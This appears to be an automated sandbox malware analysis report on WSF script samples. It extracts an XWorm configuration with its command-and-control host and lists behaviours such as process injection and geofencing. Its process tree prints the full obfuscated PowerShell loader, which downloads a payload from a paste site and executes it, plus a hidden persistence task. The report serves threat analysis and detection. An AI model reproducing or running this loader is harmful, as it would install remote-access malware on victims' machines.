Overview
overview
10Static
static
1New_Docume...65.wsf
windows7-x64
8New_Docume...65.wsf
windows10-2004-x64
10New_Docume...42.wsf
windows7-x64
8New_Docume...42.wsf
windows10-2004-x64
10New_Docume...07.wsf
windows7-x64
8New_Docume...07.wsf
windows10-2004-x64
10New_Docume...06.wsf
windows7-x64
8New_Docume...06.wsf
windows10-2004-x64
10New_Docume...75.wsf
windows7-x64
8New_Docume...75.wsf
windows10-2004-x64
10New_Docume...59.wsf
windows7-x64
8New_Docume...59.wsf
windows10-2004-x64
10New_Docume...66.wsf
windows7-x64
8New_Docume...66.wsf
windows10-2004-x64
10New_Docume...60.wsf
windows7-x64
8New_Docume...60.wsf
windows10-2004-x64
10New_Docume...76.wsf
windows7-x64
8New_Docume...76.wsf
windows10-2004-x64
10New_Docume...20.wsf
windows7-x64
8New_Docume...20.wsf
windows10-2004-x64
10New_Docume...52.wsf
windows7-x64
8New_Docume...52.wsf
windows10-2004-x64
10New_Docume...83.wsf
windows7-x64
8New_Docume...83.wsf
windows10-2004-x64
10New_Docume...75.wsf
windows7-x64
8New_Docume...75.wsf
windows10-2004-x64
10New_Docume...54.wsf
windows7-x64
8New_Docume...54.wsf
windows10-2004-x64
10New_Docume...07.wsf
windows7-x64
8New_Docume...07.wsf
windows10-2004-x64
10New_Docume...75.wsf
windows7-x64
8New_Docume...75.wsf
windows10-2004-x64
10Analysis
-
max time kernel
95s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25/09/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
New_Document-660100069565.wsf
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
New_Document-660100069565.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
New_Document-660100089442.wsf
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
New_Document-660100089442.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
New_Document-660100324207.wsf
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
New_Document-660100324207.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
New_Document-660100401006.wsf
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
New_Document-660100401006.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
New_Document-660101335975.wsf
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
New_Document-660101335975.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
New_Document-660103261859.wsf
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
New_Document-660103261859.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
New_Document-660103451766.wsf
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
New_Document-660103451766.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
New_Document-660103764860.wsf
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
New_Document-660103764860.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
New_Document-660103782076.wsf
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
New_Document-660103782076.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral19
Sample
New_Document-660104074420.wsf
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
New_Document-660104074420.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral21
Sample
New_Document-660104278752.wsf
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
New_Document-660104278752.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral23
Sample
New_Document-660104465083.wsf
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
New_Document-660104465083.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral25
Sample
New_Document-660104663275.wsf
Resource
win7-20240708-en
Behavioral task
behavioral26
Sample
New_Document-660104663275.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral27
Sample
New_Document-660104744454.wsf
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
New_Document-660104744454.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral29
Sample
New_Document-660105100807.wsf
Resource
win7-20240729-en
Behavioral task
behavioral30
Sample
New_Document-660105100807.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral31
Sample
New_Document-660105449375.wsf
Resource
win7-20240903-en
General
-
Target
New_Document-660103261859.wsf
-
Size
3KB
-
MD5
a017aaab564ce9665269dec051f54d18
-
SHA1
c204ae4df36798a80c3642a25e229901d656afce
-
SHA256
f7a0691d6df4295e5a8165ebad02b7db0be5d1cdb63ba280bd59d6d689e0ed51
-
SHA512
786b23d937e339808eb744e9e27128ef9a6e1fbe30c8ea8c3ccca7425dd56bc5f720d36da1a05db2658bd333a05260d05cf9402bf99f880135d4c0aa6819f78f
Malware Config
Extracted
xworm
5.0
TANTA0Y.WORK.GD:7000
vFAJsxkUeYzisV3m
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral12/memory/2088-50-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 8 3344 powershell.exe 20 3344 powershell.exe 22 3344 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 432 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 api.ipify.org 20 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 432 set thread context of 2088 432 powershell.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3344 powershell.exe 3344 powershell.exe 2640 powershell.exe 2640 powershell.exe 432 powershell.exe 432 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3344 powershell.exe Token: SeIncreaseQuotaPrivilege 3344 powershell.exe Token: SeSecurityPrivilege 3344 powershell.exe Token: SeTakeOwnershipPrivilege 3344 powershell.exe Token: SeLoadDriverPrivilege 3344 powershell.exe Token: SeSystemProfilePrivilege 3344 powershell.exe Token: SeSystemtimePrivilege 3344 powershell.exe Token: SeProfSingleProcessPrivilege 3344 powershell.exe Token: SeIncBasePriorityPrivilege 3344 powershell.exe Token: SeCreatePagefilePrivilege 3344 powershell.exe Token: SeBackupPrivilege 3344 powershell.exe Token: SeRestorePrivilege 3344 powershell.exe Token: SeShutdownPrivilege 3344 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeSystemEnvironmentPrivilege 3344 powershell.exe Token: SeRemoteShutdownPrivilege 3344 powershell.exe Token: SeUndockPrivilege 3344 powershell.exe Token: SeManageVolumePrivilege 3344 powershell.exe Token: 33 3344 powershell.exe Token: 34 3344 powershell.exe Token: 35 3344 powershell.exe Token: 36 3344 powershell.exe Token: SeIncreaseQuotaPrivilege 3344 powershell.exe Token: SeSecurityPrivilege 3344 powershell.exe Token: SeTakeOwnershipPrivilege 3344 powershell.exe Token: SeLoadDriverPrivilege 3344 powershell.exe Token: SeSystemProfilePrivilege 3344 powershell.exe Token: SeSystemtimePrivilege 3344 powershell.exe Token: SeProfSingleProcessPrivilege 3344 powershell.exe Token: SeIncBasePriorityPrivilege 3344 powershell.exe Token: SeCreatePagefilePrivilege 3344 powershell.exe Token: SeBackupPrivilege 3344 powershell.exe Token: SeRestorePrivilege 3344 powershell.exe Token: SeShutdownPrivilege 3344 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeSystemEnvironmentPrivilege 3344 powershell.exe Token: SeRemoteShutdownPrivilege 3344 powershell.exe Token: SeUndockPrivilege 3344 powershell.exe Token: SeManageVolumePrivilege 3344 powershell.exe Token: 33 3344 powershell.exe Token: 34 3344 powershell.exe Token: 35 3344 powershell.exe Token: 36 3344 powershell.exe Token: SeIncreaseQuotaPrivilege 3344 powershell.exe Token: SeSecurityPrivilege 3344 powershell.exe Token: SeTakeOwnershipPrivilege 3344 powershell.exe Token: SeLoadDriverPrivilege 3344 powershell.exe Token: SeSystemProfilePrivilege 3344 powershell.exe Token: SeSystemtimePrivilege 3344 powershell.exe Token: SeProfSingleProcessPrivilege 3344 powershell.exe Token: SeIncBasePriorityPrivilege 3344 powershell.exe Token: SeCreatePagefilePrivilege 3344 powershell.exe Token: SeBackupPrivilege 3344 powershell.exe Token: SeRestorePrivilege 3344 powershell.exe Token: SeShutdownPrivilege 3344 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeSystemEnvironmentPrivilege 3344 powershell.exe Token: SeRemoteShutdownPrivilege 3344 powershell.exe Token: SeUndockPrivilege 3344 powershell.exe Token: SeManageVolumePrivilege 3344 powershell.exe Token: 33 3344 powershell.exe Token: 34 3344 powershell.exe Token: 35 3344 powershell.exe Token: 36 3344 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2776 wrote to memory of 3344 2776 WScript.exe 81 PID 2776 wrote to memory of 3344 2776 WScript.exe 81 PID 3344 wrote to memory of 2640 3344 powershell.exe 85 PID 3344 wrote to memory of 2640 3344 powershell.exe 85 PID 2404 wrote to memory of 3952 2404 WScript.exe 95 PID 2404 wrote to memory of 3952 2404 WScript.exe 95 PID 3952 wrote to memory of 3584 3952 cmd.exe 97 PID 3952 wrote to memory of 3584 3952 cmd.exe 97 PID 3584 wrote to memory of 432 3584 cmd.exe 98 PID 3584 wrote to memory of 432 3584 cmd.exe 98 PID 432 wrote to memory of 2088 432 powershell.exe 99 PID 432 wrote to memory of 2088 432 powershell.exe 99 PID 432 wrote to memory of 2088 432 powershell.exe 99 PID 432 wrote to memory of 2088 432 powershell.exe 99 PID 432 wrote to memory of 2088 432 powershell.exe 99 PID 432 wrote to memory of 2088 432 powershell.exe 99 PID 432 wrote to memory of 2088 432 powershell.exe 99 PID 432 wrote to memory of 2088 432 powershell.exe 99
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New_Document-660103261859.wsf"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = [STRINg]::jOIn('' , ( ( 24,52 ,'3d', 27, 49 , 65, 58 ,28, '4e' ,65 ,27,'3b', 24 , 52,45 , 20, '3d' ,20, 24 ,52,'2b' ,27 ,57, '2d' ,'4f' , 42 ,'4a',27 ,'3b',24 , 52, 45 ,44 ,20 ,'3d' ,20,24 ,52, 45,'2b',27 ,65,43, 54 , 20 , '4e' , 65 ,54 ,'2e' , 57,27,'3b',24, 50,41,43 , '3d' ,27 , 65 , 42 , 43 , '4c',27,'3b' , 24 , 78 ,78 ,20,'3d',20 ,24,50 ,41 ,43,'2b' , 27 ,49 , 65, '4e' , 27 , '3b',24, 52, '4f' , 20,'3d' , 20 ,24, 78, 78 ,'2b' ,27,54 , 29 ,'2e', 44, '4f' , 57, '4e','4c','4f',27, '3b' ,24,'7a', '7a', '3d' ,27 ,'4f' ,40,30, 28 , 26, 28 ,27 , 27,68 , 74 ,74 ,70 ,73, '3a','2f' , '2f',70,61,73,74 ,65, '2e' ,65 ,65,'2f',72, '2f',79, 45, 55 , '4d',51,'2f' , 30,27,27 ,29 ,27 , '2e', 52,65,50 , '4c' ,41 , 43, 65, 28 ,27,'4f', 40 , 30, 28, 26 , 27,'2c' ,27 , 41, 44,53 , 54 ,52, 49 ,'4e' ,47,27,29 ,'3b' , 69,65,78,28, 24 ,52 ,45 , 44, '2b' , 24 ,52 , '4f','2b', 24,'7a' ,'7a',29 ) |foREAcH-Object{( [CONVeRT]::ToiNt16(([sTrING]$_ ),16) -AS[CHaR])})) |& ( $ShEllid[1]+$SheLLID[13]+'x') ; powershell $ReDrO"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath = "\")"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2640
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\system32\cmd.execmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"3⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2088
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5c3f2ca9b3ea3da4f346900dffdb028c1
SHA1b0f2b20b6789958fa42e41949ace44875358cdd1
SHA256fe4ed5dc25a2f658d48413b7c3badea8ad3d82885b5d59192833071a67f58ec4
SHA5129abb200cef06ac9428930d31f84976dbec8abb5f0411906d60030dac503f967136c9f4410ca0bfc158d940799db95162071e3088cb581fcd625e9f509fbef1a5
-
Filesize
171B
MD53f6de49cf708411dd235d9021dba2b90
SHA1ce36ca1a36a7e52351a34223f8f4dac3182a5dfb
SHA2560a94db5411a2faa6c82ba90aeba60f7c018a80c77f2adf3fc1f0982890dcc712
SHA5122a28b411a5bb322a7a18b94947255ee7f78bc62de401c602edf849d10914696d4883867b9336c3207d8bb4117af047542e721eb23030d1b1c2e64ae72d27f938
-
Filesize
322KB
MD5b0075a19a856734533f722043e051550
SHA10f86492b16a0f839261ad809b473bfc6b53cc407
SHA256a531f92b31f469f4e82bd5787ddc111d46aca951d07561a82e7ec6ce1e85595a
SHA5123da9dfebaf73040d7a67f65b3d4f22708d1fed59b430238ab08056bd5c9de194b53a192ab01ec3f6b9d02395785069134a4df7d55182f74334cf50d28b93b625
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD51e2ba98850274b15c81347fb3d2055f8
SHA1a82705a3c01a95582cde97d02997f0fb9945bfae
SHA2568661ee31d0d1c2242a7d100958c504523caabd7709b67ad02fc2dc64e91f9a5f
SHA512b6a8d1752023a3fcfdff4c50e1e5f2420b67bec808a83ad8210fa8a75437d3466ca613908c9d8d7802a0c36aeb607d603aa6b4d355c4ef6009a267d1bee440d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82